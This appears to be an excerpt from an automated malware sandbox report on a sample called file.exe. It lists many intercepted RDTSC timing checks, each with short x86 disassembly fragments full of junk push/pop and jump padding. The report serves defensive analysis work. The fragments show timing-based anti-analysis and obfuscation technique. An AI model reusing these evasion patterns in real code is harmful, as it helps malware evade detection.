                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926C38 second address: 926C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F9820CD6B9Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F9820CD6B96h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926F22 second address: 926F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926F2D second address: 926F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 927477 second address: 927480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 927480 second address: 927484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 927484 second address: 9274A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Dh 0x00000007 jnl 00007F98219BDB66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9274A1 second address: 9274BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F9820CD6B9Bh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jns 00007F9820CD6B98h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA163 second address: 8BA167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD020 second address: 8FD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD025 second address: 8FD070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F98219BDB72h 0x00000011 nop 0x00000012 jmp 00007F98219BDB77h 0x00000017 lea eax, dword ptr [ebp+1247EDE0h] 0x0000001d xor dword ptr [ebp+122D35B9h], edx 0x00000023 nop 0x00000024 push esi 0x00000025 jng 00007F98219BDB6Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD070 second address: 8FD080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jbe 00007F9820CD6BAFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD080 second address: 8DD219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, 2A659000h 0x0000000f call dword ptr [ebp+122D20A0h] 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F98219BDB73h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD117 second address: 8FD1D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9820CD6BA2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebx 0x00000010 jmp 00007F9820CD6BA8h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c or dword ptr [ebp+1244ED40h], ebx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov ch, 67h 0x0000002b mov dword ptr [ebp+1247EE38h], esp 0x00000031 mov dword ptr [ebp+122D35C0h], edi 0x00000037 cmp dword ptr [ebp+122D2A77h], 00000000h 0x0000003e jne 00007F9820CD6C47h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007F9820CD6B98h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov edi, dword ptr [ebp+122D2CCFh] 0x00000064 adc dx, 086Ah 0x00000069 mov byte ptr [ebp+122D3068h], 00000047h 0x00000070 mov cx, ax 0x00000073 mov eax, D49AA7D2h 0x00000078 add edx, 4760993Fh 0x0000007e push eax 0x0000007f pushad 0x00000080 jmp 00007F9820CD6BA0h 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD4D1 second address: 8FD4D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD4D5 second address: 8FD4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9820CD6BA2h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD4EF second address: 8FD4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD58A second address: 8FD58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD58F second address: 8FD5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4C1E7121h 0x00000010 sub ecx, dword ptr [ebp+122D2A03h] 0x00000016 push E5E6CE84h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F98219BDB72h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD701 second address: 8FD714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dx, si 0x0000000d nop 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD714 second address: 8FD728 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD728 second address: 8FD72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD72E second address: 8FD732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD9E6 second address: 8FD9F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDEEE second address: 8FDEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDEF2 second address: 8FDEF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDEF8 second address: 8FDEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE156 second address: 8FE173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9820CD6B9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE173 second address: 8FE177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE177 second address: 8FE181 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE181 second address: 8FE1D5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F98219BDB7Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cl, C1h 0x0000000d lea eax, dword ptr [ebp+1247EE24h] 0x00000013 pushad 0x00000014 jnl 00007F98219BDB6Ch 0x0000001a pushad 0x0000001b mov ecx, dword ptr [ebp+122D2ABBh] 0x00000021 mov eax, dword ptr [ebp+122D211Ah] 0x00000027 popad 0x00000028 popad 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F98219BDB6Dh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE1D5 second address: 8DDD21 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9820CD6B9Ch 0x00000008 jc 00007F9820CD6B96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F9820CD6BA7h 0x00000016 nop 0x00000017 jmp 00007F9820CD6B9Ah 0x0000001c lea eax, dword ptr [ebp+1247EDE0h] 0x00000022 and edx, dword ptr [ebp+122D2CBBh] 0x00000028 push eax 0x00000029 jmp 00007F9820CD6BA2h 0x0000002e mov dword ptr [esp], eax 0x00000031 cmc 0x00000032 call dword ptr [ebp+122D2E26h] 0x00000038 pushad 0x00000039 pushad 0x0000003a push esi 0x0000003b pop esi 0x0000003c pushad 0x0000003d popad 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 jl 00007F9820CD6B96h 0x00000046 popad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E0F4 second address: 92E104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F98219BDB66h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E239 second address: 92E23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E23D second address: 92E241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E241 second address: 92E24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F9820CD6B98h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E3AC second address: 92E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E3B0 second address: 92E3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E3B6 second address: 92E3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F98219BDB6Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E670 second address: 92E675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E675 second address: 92E67B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E67B second address: 92E681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E681 second address: 92E685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E685 second address: 92E689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932287 second address: 9322AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Ch 0x00000007 jmp 00007F98219BDB6Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322AB second address: 9322AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322AF second address: 9322B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376C5 second address: 9376C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376C9 second address: 9376CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376CF second address: 9376D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376D8 second address: 9376DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376DE second address: 9376FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jne 00007F9820CD6B96h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jc 00007F9820CD6B96h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376FD second address: 937706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93796B second address: 937996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9820CD6BA0h 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9820CD6BA1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE25 second address: 93FE2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE2B second address: 93FE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE31 second address: 93FE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE35 second address: 93FE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA9h 0x00000007 jmp 00007F9820CD6B9Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F9820CD6B96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9EA second address: 93E9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9F0 second address: 93E9F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EB2B second address: 93EB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EB31 second address: 93EB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9820CD6B9Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECA0 second address: 93ECA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECA9 second address: 93ECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECC1 second address: 93ECC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F0A3 second address: 93F0DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9820CD6BB2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c jne 00007F9820CD6B96h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F9820CD6B96h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F3E9 second address: 93F3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F3EE second address: 93F40E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9820CD6BB2h 0x00000008 jmp 00007F9820CD6BA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F886 second address: 93F88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F88A second address: 93F8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9820CD6BA7h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F8A7 second address: 93F8B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FCA5 second address: 93FCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9418E6 second address: 9418F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F98219BDB66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9418F4 second address: 94190F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F9820CD6B9Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B020E second address: 8B0214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9456F8 second address: 945709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945709 second address: 945713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945713 second address: 945717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945717 second address: 94571B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947851 second address: 947860 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9820CD6B9Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947992 second address: 947999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951458 second address: 951460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951460 second address: 951465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951465 second address: 95146B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95146B second address: 951475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98219BDB66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDC5B second address: 8FDC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9518B0 second address: 9518BA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98219BDB66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953D2F second address: 953D39 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9820CD6B9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957373 second address: 957392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB79h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9574C4 second address: 9574D4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D789 second address: 95D7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB73h 0x00000009 jmp 00007F98219BDB6Bh 0x0000000e jmp 00007F98219BDB72h 0x00000013 popad 0x00000014 jc 00007F98219BDB68h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D7C6 second address: 95D7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E04F second address: 95E05F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F98219BDB72h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E05F second address: 95E076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9820CD6B96h 0x0000000a jmp 00007F9820CD6B9Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E076 second address: 95E07C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E07C second address: 95E080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
